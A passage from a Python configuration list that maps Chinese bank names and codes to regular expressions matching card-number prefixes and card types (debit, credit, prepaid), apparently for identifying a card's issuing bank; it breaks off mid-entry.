BANK_CONFIG_LIST = [ { "bankName": "中国邮政储蓄银行", "bankCode": "PSBC", "patterns": [ { "reg": r"/^(621096|621098|622150|622151|622181|622188|622199|955100|621095|620062|621285|621798|621799|621797|620529|621622|621599|621674|623218|623219)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(62215049|62215050|62215051|62218850|62218851|62218849)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(622812|622810|622811|628310|625919)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "中国工商银行", "bankCode": "ICBC", "patterns": [ { "reg": r"/^(620200|620302|620402|620403|620404|620406|620407|620409|620410|620411|620412|620502|620503|620405|620408|620512|620602|620604|620607|620611|620612|620704|620706|620707|620708|620709|620710|620609|620712|620713|620714|620802|620711|620904|620905|621001|620902|621103|621105|621106|621107|621102|621203|621204|621205|621206|621207|621208|621209|621210|621302|621303|621202|621305|621306|621307|621309|621311|621313|621211|621315|621304|621402|621404|621405|621406|621407|621408|621409|621410|621502|621317|621511|621602|621603|621604|621605|621608|621609|621610|621611|621612|621613|621614|621615|621616|621617|621607|621606|621804|621807|621813|621814|621817|621901|621904|621905|621906|621907|621908|621909|621910|621911|621912|621913|621915|622002|621903|622004|622005|622006|622007|622008|622010|622011|622012|621914|622015|622016|622003|622018|622019|622020|622102|622103|622104|622105|622013|622111|622114|622017|622110|622303|622304|622305|622306|622307|622308|622309|622314|622315|622317|622302|622402|622403|622404|622313|622504|622505|622509|622513|622517|622502|622604|622605|622606|622510|622703|622715|622806|622902|622903|622706|623002|623006|623008|623011|623012|622904|623015|623100|623202|623301|623400|623500|623602|623803|623901|623014|624100|624200|624301|624402|623700|624000)\d{12}$/g", "cardType": "DC" }, { "reg": r"/^(622200|622202|622203|622208|621225|620058|621281|900000|621558|621559|621722|621723|620086|621226|621618|620516|621227|621288|621721|900010|623062|621670|621720|621379|621240|621724|621762|621414|621375|622926|622927|622928|622929|622930|622931|621733|621732|621372|621369|621763)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(402791|427028|427038|548259|621376|621423|621428|621434|621761|621749|621300|621378|622944|622949|621371|621730|621734|621433|621370|621764|621464|621765|621750|621377|621367|621374|621731|621781)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(9558)\d{15}$/g", "cardType": "DC" }, { "reg": r"/^(370246|370248|370249|370247|370267|374738|374739)\d{9}$/g", "cardType": "CC" }, { "reg": r"/^(427010|427018|427019|427020|427029|427030|427039|438125|438126|451804|451810|451811|458071|489734|489735|489736|510529|427062|524091|427064|530970|530990|558360|524047|525498|622230|622231|622232|622233|622234|622235|622237|622239|622240|622245|622238|451804|451810|451811|458071|628288|628286|622206|526836|513685|543098|458441|622246|544210|548943|356879|356880|356881|356882|528856|625330|625331|625332|622236|524374|550213|625929|625927|625939|625987|625930|625114|622159|625021|625022|625932|622889|625900|625915|625916|622171|625931|625113|625928|625914|625986|625925|625921|625926|625942|622158|625917|625922|625934|625933|625920|625924|625017|625018|625019)\d{10}$/g", "cardType": "CC" }, { "reg": r"/^(45806|53098|45806|53098)\d{11}$/g", "cardType": "CC" }, { "reg": r"/^(622210|622211|622212|622213|622214|622220|622223|622225|622229|622215|622224)\d{10}$/g", "cardType": "SCC" }, { "reg": r"/^(620054|620142|620184|620030|620050|620143|620149|620124|620183|620094|620186|620148|620185)\d{10}$/g", "cardType": "PC" }, { "reg": r"/^(620114|620187|620046)\d{13}$/g", "cardType": "PC" } ] }, { "bankName": "中国农业银行", "bankCode": "ABC", "patterns": [ { "reg": r"/^(622841|622824|622826|622848|620059|621282|622828|622823|621336|621619|622821|622822|622825|622827|622845|622849|623018|623206|621671|622840|622843|622844|622846|622847|620501)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(95595|95596|95597|95598|95599)\d{14}$/g", "cardType": "DC" }, { "reg": r"/^(103)\d{16}$/g", "cardType": "DC" }, { "reg": r"/^(403361|404117|404118|404119|404120|404121|463758|519412|519413|520082|520083|552599|558730|514027|622836|622837|628268|625996|625998|625997|622838|625336|625826|625827|544243|548478|628269)\d{10}$/g", "cardType": "CC" }, { "reg": r"/^(622820|622830)\d{10}$/g", "cardType": "SCC" } ] }, { "bankName": "中国银行", "bankCode": "BOC", "patterns": [ { "reg": r"/^(621660|621661|621662|621663|621665|621667|621668|621669|621666|456351|601382|621256|621212|621283|620061|621725|621330|621331|621332|621333|621297|621568|621569|621672|623208|621620|621756|621757|621758|621759|621785|621786|621787|621788|621789|621790|622273|622274|622771|622772|622770|621741|621041)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(621293|621294|621342|621343|621364|621394|621648|621248|621215|621249|621231|621638|621334|621395|623040|622348)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(625908|625910|625909|356833|356835|409665|409666|409668|409669|409670|409671|409672|512315|512316|512411|512412|514957|409667|438088|552742|553131|514958|622760|628388|518377|622788|628313|628312|622750|622751|625145|622479|622480|622789|625140|622346|622347)\d{10}$/g", "cardType": "CC" }, { "reg": r"/^(518378|518379|518474|518475|518476|524865|525745|525746|547766|558868|622752|622753|622755|524864|622757|622758|622759|622761|622762|622763|622756|622754|622764|622765|558869|625905|625906|625907|625333)\d{10}$/g", "cardType": "SCC" }, { "reg": r"/^(53591|49102|377677)\d{11}$/g", "cardType": "SCC" }, { "reg": r"/^(620514|620025|620026|620210|620211|620019|620035|620202|620203|620048|620515|920000)\d{10}$/g", "cardType": "PC" }, { "reg": r"/^(620040|620531|620513|921000|620038)\d{13}$/g", "cardType": "PC" } ] }, { "bankName": "中国建设银行", "bankCode": "CCB", "patterns": [ { "reg": r"/^(621284|436742|589970|620060|621081|621467|621598|621621|621700|622280|622700|623211|623668)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(421349|434061|434062|524094|526410|552245|621080|621082|621466|621488|621499|622966|622988|622382|621487|621083|621084|620107)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(436742193|622280193)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(553242)\d{12}$/g", "cardType": "CC" }, { "reg": r"/^(625362|625363|628316|628317|356896|356899|356895|436718|436738|436745|436748|489592|531693|532450|532458|544887|552801|557080|558895|559051|622166|622168|622708|625964|625965|625966|628266|628366|622381|622675|622676|622677)\d{10}$/g", "cardType": "CC" }, { "reg": r"/^(5453242|5491031|5544033)\d{11}$/g", "cardType": "CC" }, { "reg": r"/^(622725|622728|436728|453242|491031|544033|622707|625955|625956)\d{10}$/g", "cardType": "SCC" }, { "reg": r"/^(53242|53243)\d{11}$/g", "cardType": "SCC" } ] }, { "bankName": "中国交通银行", "bankCode": "COMM", "patterns": [ { "reg": r"/^(622261|622260|622262|621002|621069|621436|621335)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(620013)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(405512|601428|405512|601428|622258|622259|405512|601428)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(49104|53783)\d{11}$/g", "cardType": "CC" }, { "reg": r"/^(434910|458123|458124|520169|522964|552853|622250|622251|521899|622253|622656|628216|622252|955590|955591|955592|955593|628218|625028|625029)\d{10}$/g", "cardType": "CC" }, { "reg": r"/^(622254|622255|622256|622257|622284)\d{10}$/g", "cardType": "SCC" }, { "reg": r"/^(620021|620521)\d{13}$/g", "cardType": "PC" } ] }, { "bankName": "招商银行", "bankCode": "CMB", "patterns": [ { "reg": r"/^(402658|410062|468203|512425|524011|622580|622588|622598|622609|95555|621286|621483|621485|621486|621299)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(690755)\d{9}$/g", "cardType": "DC" }, { "reg": r"/^(690755)\d{12}$/g", "cardType": "DC" }, { "reg": r"/^(356885|356886|356887|356888|356890|439188|439227|479228|479229|521302|356889|545620|545621|545947|545948|552534|552587|622575|622576|622577|622578|622579|545619|622581|622582|545623|628290|439225|518710|518718|628362|439226|628262|625802|625803)\d{10}$/g", "cardType": "CC" }, { "reg": r"/^(370285|370286|370287|370289)\d{9}$/g", "cardType": "CC" }, { "reg": r"/^(620520)\d{13}$/g", "cardType": "PC" } ] }, { "bankName": "中国民生银行", "bankCode": "CMBC", "patterns": [ { "reg": r"/^(622615|622616|622618|622622|622617|622619|415599|421393|421865|427570|427571|472067|472068|622620)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(545392|545393|545431|545447|356859|356857|407405|421869|421870|421871|512466|356856|528948|552288|622600|622601|622602|517636|622621|628258|556610|622603|464580|464581|523952|545217|553161|356858|622623|625912|625913|625911)\d{10}$/g", "cardType": "CC" }, { "reg": r"/^(377155|377152|377153|377158)\d{9}$/g", "cardType": "CC" } ] }, { "bankName": "中国光大银行", "bankCode": "CEB", "patterns": [ { "reg": r"/^(303)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(90030)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(620535)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(620085|622660|622662|622663|622664|622665|622666|622667|622669|622670|622671|622672|622668|622661|622674|622673|620518|621489|621492)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(356837|356838|486497|622657|622685|622659|622687|625978|625980|625981|625979|356839|356840|406252|406254|425862|481699|524090|543159|622161|622570|622650|622655|622658|625975|625977|628201|628202|625339|625976)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "中信银行", "bankCode": "CITIC", "patterns": [ { "reg": r"/^(433670|433680|442729|442730|620082|622690|622691|622692|622696|622698|622998|622999|433671|968807|968808|968809|621771|621767|621768|621770|621772|621773|622453|622456)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(622459)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(376968|376969|376966)\d{9}$/g", "cardType": "CC" }, { "reg": r"/^(400360|403391|403392|404158|404159|404171|404172|404173|404174|404157|433667|433668|433669|514906|403393|520108|433666|558916|622678|622679|622680|622688|622689|628206|556617|628209|518212|628208|356390|356391|356392|622916|622918|622919)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "华夏银行", "bankCode": "HXBANK", "patterns": [ { "reg": r"/^(622630|622631|622632|622633|999999|621222|623020|623021|623022|623023)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(523959|528709|539867|539868|622637|622638|628318|528708|622636|625967|625968|625969)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "深发/平安银行", "bankCode": "SPABANK", "patterns": [ { "reg": r"/^(621626|623058)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(602907|622986|622989|622298|627069|627068|627066|627067|412963|415752|415753|622535|622536|622538|622539|998800|412962|622983)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(531659|622157|528020|622155|622156|526855|356869|356868|625360|625361|628296|435744|435745|483536|622525|622526|998801|998802)\d{10}$/g", "cardType": "CC" }, { "reg": r"/^(620010)\d{10}$/g", "cardType": "PC" } ] }, { "bankName": "兴业银行", "bankCode": "CIB", "patterns": [ { "reg": r"/^(438589)\d{12}$/g", "cardType": "DC" }, { "reg": r"/^(90592)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(966666|622909|438588|622908)\d{12}$/g", "cardType": "DC" }, { "reg": r"/^(461982|486493|486494|486861|523036|451289|527414|528057|622901|622902|622922|628212|451290|524070|625084|625085|625086|625087|548738|549633|552398|625082|625083|625960|625961|625962|625963)\d{10}$/g", "cardType": "CC" }, { "reg": r"/^(620010)\d{10}$/g", "cardType": "PC" } ] }, { "bankName": "上海银行", "bankCode": "SHBANK", "patterns": [ { "reg": r"/^(621050|622172|622985|622987|620522|622267|622278|622279|622468|622892|940021)\d{12}$/g", "cardType": "DC" }, { "reg": r"/^(438600)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(356827|356828|356830|402673|402674|486466|519498|520131|524031|548838|622148|622149|622268|356829|622300|628230|622269|625099|625953)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "浦东发展银行", "bankCode": "SPDB", "patterns": [ { "reg": r"/^(622516|622517|622518|622521|622522|622523|984301|984303|621352|621793|621795|621796|621351|621390|621792|621791)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(84301|84336|84373|84385|84390|87000|87010|87030|87040|84380|84361|87050|84342)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(356851|356852|404738|404739|456418|498451|515672|356850|517650|525998|622177|622277|628222|622500|628221|622176|622276|622228|625957|625958|625993|625831)\d{10}$/g", "cardType": "CC" }, { "reg": r"/^(622520|622519)\d{10}$/g", "cardType": "SCC" }, { "reg": r"/^(620530)\d{13}$/g", "cardType": "PC" } ] }, { "bankName": "广发银行", "bankCode": "GDB", "patterns": [ { "reg": r"/^(622516|622517|622518|622521|622522|622523|984301|984303|621352|621793|621795|621796|621351|621390|621792|621791)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(622568|6858001|6858009|621462)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(9111)\d{15}$/g", "cardType": "DC" }, { "reg": r"/^(406365|406366|428911|436768|436769|436770|487013|491032|491033|491034|491035|491036|491037|491038|436771|518364|520152|520382|541709|541710|548844|552794|493427|622555|622556|622557|622558|622559|622560|528931|558894|625072|625071|628260|628259|625805|625806|625807|625808|625809|625810)\d{10}$/g", "cardType": "CC" }, { "reg": r"/^(685800|6858000)\d{13}$/g", "cardType": "CC" } ] }, { "bankName": "渤海银行", "bankCode": "BOHAIB", "patterns": [ { "reg": r"/^(621268|622684|622884|621453)\d{10}$/g", "cardType": "DC" } ] }, { "bankName": "广州银行", "bankCode": "GCB", "patterns": [ { "reg": r"/^(603445|622467|940016|621463)\d{13}$/g", "cardType": "DC" } ] }, { "bankName": "金华银行", "bankCode": "JHBANK", "patterns": [ { "reg": r"/^(622449|940051)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(622450|628204)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "温州银行", "bankCode": "WZCB", "patterns": [ { "reg": r"/^(621977)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(622868|622899|628255)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "徽商银行", "bankCode": "HSBANK", "patterns": [ { "reg": r"/^(622877|622879|621775|623203)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(603601|622137|622327|622340|622366)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(628251|622651|625828)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "江苏银行", "bankCode": "JSBANK", "patterns": [ { "reg": r"/^(621076|622173|622131|621579|622876)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(504923|622422|622447|940076)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(628210|622283|625902)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "南京银行", "bankCode": "NJCB", "patterns": [ { "reg": r"/^(621777|622305|621259)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(622303|628242|622595|622596)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "宁波银行", "bankCode": "NBBANK", "patterns": [ { "reg": r"/^(621279|622281|622316|940022)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(621418)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(625903|622778|628207|512431|520194|622282|622318)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "北京银行", "bankCode": "BJBANK", "patterns": [ { "reg": r"/^(623111|421317|422161|602969|422160|621030|621420|621468)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(522001|622163|622853|628203|622851|622852)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "北京农村商业银行", "bankCode": "BJRCB", "patterns": [ { "reg": r"/^(620088|621068|622138|621066|621560)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(625526|625186|628336)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "汇丰银行", "bankCode": "HSBC", "patterns": [ { "reg": r"/^(622946)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(622406|621442)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(622407|621443)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(622360|622361|625034|625096|625098)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "渣打银行", "bankCode": "SCB", "patterns": [ { "reg": r"/^(622948|621740|622942|622994)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(622482|622483|622484)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "花旗银行", "bankCode": "CITI", "patterns": [ { "reg": r"/^(621062|621063)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(625076|625077|625074|625075|622371|625091)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "东亚银行", "bankCode": "HKBEA", "patterns": [ { "reg": r"/^(622933|622938|623031|622943|621411)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(622372|622471|622472|622265|622266|625972|625973)\d{10}$/g", "cardType": "CC" }, { "reg": r"/^(622365)\d{11}$/g", "cardType": "CC" } ] }, { "bankName": "广东华兴银行", "bankCode": "GHB", "patterns": [ { "reg": r"/^(621469|621625)\d{13}$/g", "cardType": "DC" } ] }, { "bankName": "深圳农村商业银行", "bankCode": "SRCB", "patterns": [ { "reg": r"/^(622128|622129|623035)\d{10}$/g", "cardType": "DC" } ] }, { "bankName": "广州农村商业银行股份有限公司", "bankCode": "GZRCU", "patterns": [ { "reg": r"/^(909810|940035|621522|622439)\d{12}$/g", "cardType": "DC" } ] }, { "bankName": "东莞农村商业银行", "bankCode": "DRCBCL", "patterns": [ { "reg": r"/^(622328|940062|623038)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(625288|625888)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "东莞市商业银行", "bankCode": "BOD", "patterns": [ { "reg": r"/^(622333|940050)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(621439|623010)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(622888)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "广东省农村信用社联合社", "bankCode": "GDRCC", "patterns": [ { "reg": r"/^(622302)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(622477|622509|622510|622362|621018|621518)\d{13}$/g", "cardType": "DC" } ] }, { "bankName": "大新银行", "bankCode": "DSB", "patterns": [ { "reg": r"/^(622297|621277)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(622375|622489)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(622293|622295|622296|622373|622451|622294|625940)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "永亨银行", "bankCode": "WHB", "patterns": [ { "reg": r"/^(622871|622958|622963|622957|622861|622932|622862|621298)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(622798|625010|622775|622785)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "星展银行香港有限公司", "bankCode": "DBS", "patterns": [ { "reg": r"/^(621016|621015)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(622487|622490|622491|622492)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(622487|622490|622491|622492|621744|621745|621746|621747)\d{11}$/g", "cardType": "DC" } ] }, { "bankName": "恒丰银行", "bankCode": "EGBANK", "patterns": [ { "reg": r"/^(623078)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(622384|940034)\d{11}$/g", "cardType": "DC" } ] }, { "bankName": "天津市商业银行", "bankCode": "TCCB", "patterns": [ { "reg": r"/^(940015|622331)\d{12}$/g", "cardType": "DC" }, { "reg": r"/^(6091201)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(622426|628205)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "天津滨海德商村镇银行", "bankCode": "BDCBANK", "patterns": [ { "reg": r"/^(621091)\d{13}$/g", "cardType": "DC" } ] }, { "bankName": "浙商银行", "bankCode": "CZBANK", "patterns": [ { "reg": r"/^(621019|622309|621019)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(6223091100|6223092900|6223093310|6223093320|6223093330|6223093370|6223093380|6223096510|6223097910)\d{9}$/g", "cardType": "DC" } ] }, { "bankName": "南洋商业银行", "bankCode": "NCB", "patterns": [ { "reg": r"/^(621213|621289|621290|621291|621292|621042|621743)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(623041|622351)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(625046|625044|625058|622349|622350)\d{10}$/g", "cardType": "CC" }, { "reg": r"/^(620208|620209|625093|625095)\d{10}$/g", "cardType": "PC" } ] }, { "bankName": "厦门银行", "bankCode": "XMBANK", "patterns": [ { "reg": r"/^(622393|940023)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(6886592)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(623019|621600|)\d{13}$/g", "cardType": "DC" } ] }, { "bankName": "福建海峡银行", "bankCode": "FJHXBC", "patterns": [ { "reg": r"/^(622388)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(621267|623063)\d{12}$/g", "cardType": "DC" }, { "reg": r"/^(620043|)\d{12}$/g", "cardType": "PC" } ] }, { "bankName": "吉林银行", "bankCode": "JLBANK", "patterns": [ { "reg": r"/^(622865|623131)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(940012)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(622178|622179|628358)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "汉口银行", "bankCode": "HKB", "patterns": [ { "reg": r"/^(990027)\d{12}$/g", "cardType": "DC" }, { "reg": r"/^(622325|623105|623029)\d{10}$/g", "cardType": "DC" } ] }, { "bankName": "盛京银行", "bankCode": "SJBANK", "patterns": [ { "reg": r"/^(566666)\d{12}$/g", "cardType": "DC" }, { "reg": r"/^(622455|940039)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(623108|623081)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(622466|628285)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "大连银行", "bankCode": "DLB", "patterns": [ { "reg": r"/^(603708)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(622993|623069|623070|623172|623173)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(622383|622385|628299)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "河北银行", "bankCode": "BHB", "patterns": [ { "reg": r"/^(622498|622499|623000|940046)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(622921|628321)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "乌鲁木齐市商业银行", "bankCode": "URMQCCB", "patterns": [ { "reg": r"/^(621751|622143|940001|621754)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(622476|628278)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "绍兴银行", "bankCode": "SXCB", "patterns": [ { "reg": r"/^(622486)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(603602|623026|623086)\d{12}$/g", "cardType": "DC" }, { "reg": r"/^(628291)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "成都商业银行", "bankCode": "CDCB", "patterns": [ { "reg": r"/^(622152|622154|622996|622997|940027|622153|622135|621482|621532)\d{13}$/g", "cardType": "DC" } ] }, { "bankName": "抚顺银行", "bankCode": "FSCB", "patterns": [ { "reg": r"/^(622442)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(940053)\d{12}$/g", "cardType": "DC" }, { "reg": r"/^(622442|623099)\d{13}$/g", "cardType": "DC" } ] }, { "bankName": "郑州银行", "bankCode": "ZZBANK", "patterns": [ { "reg": r"/^(622421)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(940056)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(96828)\d{11}$/g", "cardType": "DC" } ] }, { "bankName": "宁夏银行", "bankCode": "NXBANK", "patterns": [ { "reg": r"/^(621529|622429|621417|623089|623200)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(628214|625529|622428)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "重庆银行", "bankCode": "CQBANK", "patterns": [ { "reg": r"/^(9896)\d{12}$/g", "cardType": "DC" }, { "reg": r"/^(622134|940018|623016)\d{10}$/g", "cardType": "DC" } ] }, { "bankName": "哈尔滨银行", "bankCode": "HRBANK", "patterns": [ { "reg": r"/^(621577|622425)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(940049)\d{12}$/g", "cardType": "DC" }, { "reg": r"/^(622425)\d{11}$/g", "cardType": "DC" } ] }, { "bankName": "兰州银行", "bankCode": "LZYH", "patterns": [ { "reg": r"/^(622139|940040|628263)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(621242|621538|621496)\d{13}$/g", "cardType": "DC" } ] }, { "bankName": "青岛银行", "bankCode": "QDCCB", "patterns": [ { "reg": r"/^(621252|622146|940061|628239)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(621419|623170)\d{13}$/g", "cardType": "DC" } ] }, { "bankName": "秦皇岛市商业银行", "bankCode": "QHDCCB", "patterns": [ { "reg": r"/^(62249802|94004602)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(621237|623003)\d{13}$/g", "cardType": "DC" } ] }, { "bankName": "青海银行", "bankCode": "BOQH", "patterns": [ { "reg": r"/^(622310|940068)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(622817|628287|625959)\d{10}$/g", "cardType": "CC" }, { "reg": r"/^(62536601)\d{8}$/g", "cardType": "CC" } ] }, { "bankName": "台州银行", "bankCode": "TZCB", "patterns": [ { "reg": r"/^(622427)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(940069)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(623039)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(622321|628273)\d{10}$/g", "cardType": "CC" }, { "reg": r"/^(625001)\d{10}$/g", "cardType": "SCC" } ] }, { "bankName": "长沙银行", "bankCode": "CSCB", "patterns": [ { "reg": r"/^(694301)\d{12}$/g", "cardType": "DC" }, { "reg": r"/^(940071|622368|621446)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(625901|622898|622900|628281|628282|622806|628283)\d{10}$/g", "cardType": "CC" }, { "reg": r"/^(620519)\d{13}$/g", "cardType": "PC" } ] }, { "bankName": "泉州银行", "bankCode": "BOQZ", "patterns": [ { "reg": r"/^(683970|940074)\d{12}$/g", "cardType": "DC" }, { "reg": r"/^(622370)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(621437)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(628319)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "包商银行", "bankCode": "BSB", "patterns": [ { "reg": r"/^(622336|621760)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(622165)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(622315|625950|628295)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "龙江银行", "bankCode": "DAQINGB", "patterns": [ { "reg": r"/^(621037|621097|621588|622977)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(62321601)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(622860)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(622644|628333)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "上海农商银行", "bankCode": "SHRCB", "patterns": [ { "reg": r"/^(622478|940013|621495)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(625500)\d{10}$/g", "cardType": "SCC" }, { "reg": r"/^(622611|622722|628211|625989)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "浙江泰隆商业银行", "bankCode": "ZJQL", "patterns": [ { "reg": r"/^(622717)\d{10}$/g", "cardType": "SCC" }, { "reg": r"/^(628275|622565|622287)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "内蒙古银行", "bankCode": "H3CB", "patterns": [ { "reg": r"/^(622147|621633)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(628252)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "广西北部湾银行", "bankCode": "BGB", "patterns": [ { "reg": r"/^(623001)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(628227)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "桂林银行", "bankCode": "GLBANK", "patterns": [ { "reg": r"/^(621456)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(621562)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(628219)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "龙江银行", "bankCode": "DAQINGB", "patterns": [ { "reg": r"/^(621037|621097|621588|622977)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(62321601)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(622475|622860)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(625588)\d{10}$/g", "cardType": "SCC" }, { "reg": r"/^(622270|628368|625090|622644|628333)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "成都农村商业银行", "bankCode": "CDRCB", "patterns": [ { "reg": r"/^(623088)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(622829|628301|622808|628308)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "福建省农村信用社联合社", "bankCode": "FJNX", "patterns": [ { "reg": r"/^(622127|622184|621701|621251|621589|623036)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(628232|622802|622290)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "天津农村商业银行", "bankCode": "TRCB", "patterns": [ { "reg": r"/^(622531|622329)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(622829|628301)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "江苏省农村信用社联合社", "bankCode": "JSRCU", "patterns": [ { "reg": r"/^(621578|623066|622452|622324)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(622815|622816|628226)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "湖南农村信用社联合社", "bankCode": "SLH", "patterns": [ { "reg": 